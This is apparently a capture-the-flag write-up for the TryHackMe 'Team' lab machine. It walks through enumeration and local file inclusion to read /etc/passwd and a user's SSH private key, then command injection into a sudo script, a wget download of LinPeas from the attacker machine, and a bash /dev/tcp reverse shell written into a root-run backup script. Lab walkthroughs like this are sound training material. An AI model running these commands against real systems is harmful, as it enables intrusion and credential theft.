Content:
- Introduction
- Scanning and enumeration
- Initial footholds
- Exploitation and Privilege Escalation
- Conclusion
Introduction:
TryHackMe boxes are always a new learning, every box has something to new learn. As the box is a boot2root linux machine.
This box is one which will make scratch your head during initial phase of enumeration, and there are more than one ways to get onto the root.
This box will add a lot of web enumeration skills to your skill set. starting from discovering directories, files, virtual host, exploiting local file inclusion vulnerability.
With all being said let’s jump right in.
Scanning:
Ones the machine is up and running, head start with initial “NMAP” to know what ports are open and running services on those ports.
$nmap -v -sV -sC [machine-ip]
NMAP scan returns with 3 ports open 21, 22 and 80 with services FTP, SSH and Apache httpd running respectively.
FTP does not allow anonymous login and we don’t have any login credentials as of now to move forward with FTP or SSH, so let’s try what can be extracted from web-server.
On browsing the machine ip on favorite browser, it land up on a default Apache page where we could not get much info.
After some common enumeration like robots.txt, directory brute forcing there was nothing and seems to be a dead end at that point, but there was one thing left to get hands on that was the source code. Upon looking through the source code, title of the page was provided with one relevant info.
“If you see this add team.thm to your hosts!”
Adding team.thm to hosts and then browsing team.thm lands up on a bootstrap page where there was nothing useful on the page.
On more enumeration, robots.txt file gives a name might be potentially a user name i.e “dale” and directory brute-forcing returns with some files and directories out of which “scripts” seems to be interesting and fuzzing more into that directory could fetch some potential useful info.
$gobuster dir -u http://team.thm -w /usr/share/seclists/Discovery/Web-content/directory-list-lowercare-2.3-medium.txt
$gobuster dir -u http://team.thm/scripts -w /usr/share/seclists/Discovery/Web-content/directory-list-lowercare-2.3-medium.txt -x php,js,txt
There is this one thing to tell, it was totally a blind shot while running gobuster to get more info on scripts directory, simultaneously ran wfuzz for DNS fuzzing if some other domain is also associated and guess what, results returned with one sub-domain (dev), gobuster returned with scripts.txt file.
$wfuzz -c — hw 977 -u http://team.thm -H “Host: FUZZ.team.thm” -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
Keeping discovered sub-domain aside for a while and heading towards http://team.thm/scripts/script.txt, here is a bash script and at the end there is a note saying “Had to change the extension of old ‘script’ in this folder, as it has creds in”. Which makes sense that there is one more script file here in this directory only with some other extension. We can go ahead to check for that file throwing some more relevant extensions, but on the other hand brain was compelled to look for (dev) sub-domain, assuming to be like some under development page or something.
Initial Footholds:
Till here a lot of enumeration has been done, and seems like can pop-up an initial shell.
http://dev.team.thm gave us a page with place holder to team share link and which is directed to read a teamshare.php file.
There it seems to be suspicious or seems to vulnerable if it can read some php file we can try reading some other files available on linux servers, which will lead to Local File Inclusion Vulnerability (LFI).
Trying to read some most common files on linux file system like /etc/passwd and was successful to read.
Giving a close look onto /etc/passwd file it can be infered tha there are 3 users that have capability to pop-up bash shell (gyles being new one), if this is the
case then it might be possible to read private ssh keys for the current user.
With all positive hopes requested /etc/ssh/sshd_config file if anyhow possibly can get ssh keys and it was a success 200.
Received Dale’s private ssh keys.
Ones the file is loaded it seems all distorted, but go to view page source and can easy copy id_rsa keys in a proper format. Don’t forget to remove hash(#) symbol from beginning of every line and give required permission.
There ready to login Dale through SSH.
$ sudo chmod 600 id_rsa
$ssh -i id_rsa dale@team.thm
Upon successful login, stable shell is prompted for user dale.
Exploitation and Privilege Escalation:
We have the shell here, user flag as well now what next, i don’t think we can directly escalate to root as there was one more use “gyles” mentioned. Before running automated scripts like Linpeas or LinEnum, bit of manual enumeration would be good.
$sudo -l
User dale can admin_checks as gyles without any password. So, head towards and check how we can exploit this further.
This is a simple script taking 2 user inputs, 1st “name” and 2nd “date”. 1st input is being written to a text file /var/stats/stats.txt which is of no use here. But the interesting part is 2nd input which is parsing error to 2>/dev/null and can be used to get shell.
$ sudo -u gyles /home/gyles/admin_checks
Provide anything when prompted for name that doesn’t matter but what matters is date, just enter “/bin/bash -i” and will be prompted with an unstable shell.$ python3 -c “import pty;pty.spawn(‘/bin/bash’)”
$ export TERM=xterm
stabilizing shell
Here manual enumeration was not much worth doing it, so enumerating through any of the automated scripts was a good option.
Attacker_machine:
$ python3 -m http.server 8080Attacking_machine:
$ cd /tmp
$ wget http://[attacker-ip]:8080/LinPeas.sh
$ chmod a+x LinPeas.sh
$./Linpeas.sh
LinPeas returns with 2 backup file and one of the them is having writable permission to admin group (/usr/local/bin/main_backup.sh) & executed by root. On observing carefully Gyles belong to admin group.
$ echo “ bash -i >& /dev/tcp/[attacker-ip]/[port] 0>&1” > /usr/local/bin/main_backup.sh
Don’t forget to start listener on your own machine.
And there it goes viola, Got access to root shell.
Conclusion:
The box was an easy one but there was a lot of enumeration required.
Vulnerabilities:
1. Publicly available under development domain, Leading to Local File Inclusion vulnerability.
2. Configuration of web-sever: SSH keys had read permission on web hosted user.
3. Weak script code which was producing an error and throwing it to 2>/dev/null.
4. Inappropriate Permissions: Root executed Back file had write/read permission with Gyles user.
That’s all for this box.
Thanks for reading.
Definitely there are many ways to solve this box, here we miss out the usage of FTP surely which would definitely have something, the script file with other extension which could have led to FTP credentials or SSH credentials.
Happy Hacking !!
